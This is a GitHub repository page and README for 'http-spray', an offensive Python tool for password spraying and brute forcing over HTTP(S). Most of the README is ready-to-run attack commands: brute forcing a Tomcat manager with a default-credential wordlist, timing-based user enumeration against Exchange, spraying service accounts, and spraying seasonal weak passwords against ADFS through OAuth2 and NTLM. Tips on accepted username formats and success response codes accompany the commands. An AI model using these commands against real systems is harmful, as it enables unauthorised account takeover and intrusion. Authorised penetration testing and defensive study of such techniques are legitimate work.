https://github.com/dadevel/http-spray
Password Spraying and Brute Forcing over HTTP(S)
brute-force http password-spraying
- Host: GitHub
- URL: https://github.com/dadevel/http-spray
- Owner: dadevel
- License: mit
- Created: 2024-06-26T09:42:33.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-02-19T23:31:53.000Z (5 months ago)
- Last Synced: 2025-02-20T00:31:06.218Z (5 months ago)
- Topics: brute-force, http, password-spraying
- Language: Python
- Homepage:
- Size: 29.3 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# http-spray
## Setup
Install with [pipx](https://github.com/pypa/pipx/).
~~~ bash
pipx install git+https://github.com/dadevel/http-spray.git
~~~

## Usage

Brute force Tomcat manager.
~~~ bash
curl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt
http-spray -t https://app.corp.com/tomcat/manager/html -m basic -C ./tomcat-credentials.txt | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'
~~~

Time-based user enumeration against on-prem Exchange server.
Requests for valid users take about 0.1s, invalid users take more than 1.5s.

~~~ bash
http-spray -t https://mail.corp.com/rpc/ -m basic -U ./users.txt -p '' | tee -a ./http-spray.json | jq -c 'select(.time < 0.5)'
~~~

> **Note:**
>
> The user enumeration requires basic authentication and seems to work only with the user formats `corp\jdoe` and `corp.com\jdoe` where `jdoe` is the *samaccountname*.

Spray common service accounts against on-prem Exchange server.

~~~ bash
http-spray -t https://mail.corp.com/rpc/ -m ntlm -c scanner:scanner -c printer:printer | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'
~~~

> **Note:**
>
> The RPC endpoint returns 404 for successful logins.
> For alternate endpoints see [here](https://github.com/dadevel/wordlists/raw/main/windows/exchange.txt).
>
> Furthermore Exchange accepts the following username formats: `jdoe`, `corp\jdoe`, `corp.com\jdoe` and `[email protected]` where `jdoe` is the *samaccountname*.
> Depending on the environment the *mail* attribute, e.g. `[email protected]`, might work for the OWA web login.

Spray weak passwords against ADFS through OAuth2 password grant.

~~~ bash
http-spray -t https://sts.corp.com/adfs/oauth2/token/ -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json | jq -c 'select(.status_code == 200)'
~~~

Spray weak passwords against ADFS through NTLM authentication.

~~~ bash
http-spray -t https://sts.corp.com/adfs/services/trust/2005/windowstransport -m ntlm -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json
~~~

> **Note:**
>
> ADFS accepts the following username formats: `corp\jdoe`, `corp.com\jdoe` and `[email protected]` where `jdoe` is the *samaccountname*.
> Depending on the environment the *mail* attribute, e.g. `[email protected]`, might work as well.